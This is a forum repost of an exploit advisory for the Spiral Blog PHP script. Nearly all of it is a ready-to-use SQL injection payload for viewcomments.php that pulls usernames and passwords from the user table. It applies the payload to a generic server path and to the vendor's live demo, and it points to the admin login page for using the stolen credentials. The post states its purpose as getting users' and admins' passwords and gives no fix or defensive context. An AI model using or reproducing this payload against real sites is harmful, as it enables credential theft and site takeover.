Jump to content
Gonzalez

Spiral Blog SQL Injection Vulnerbilitys

Recommended Posts

Posted
--==+================================================================================+==-- 
--==+ Spiral Blog SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog


SCRIPT DOWNLOAD: N/A


SITE: [url]http://www.spiralscripts.co.uk[/url]


DORK: N/A

DESCRIPTION: get users/admins password

EXPLOITS:

EXPLOIT 1: [url]http://www.server.com/SCRIPT_PATH/viewcomments.php?blogid=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,6 from usertable--


EXAMPLES:

EXAMPLE ON DEMO: [url]http://www.spiralscripts.co.uk/demoscripts/blog/viewcomments.php?blogid=-1[/url] UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,6 from usertable--
NOTE/TIP: admin login: [url]http://www.server.com/BLOG_PATH/admin[/url]

GREETZ: milw0rm.com, H4CKY0u.org, ~removed~ !


--==+================================================================================+==--
--==+ Spiral Blog SQL Injection Vulnerbilitys +==--
--==+================================================================================+==--

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...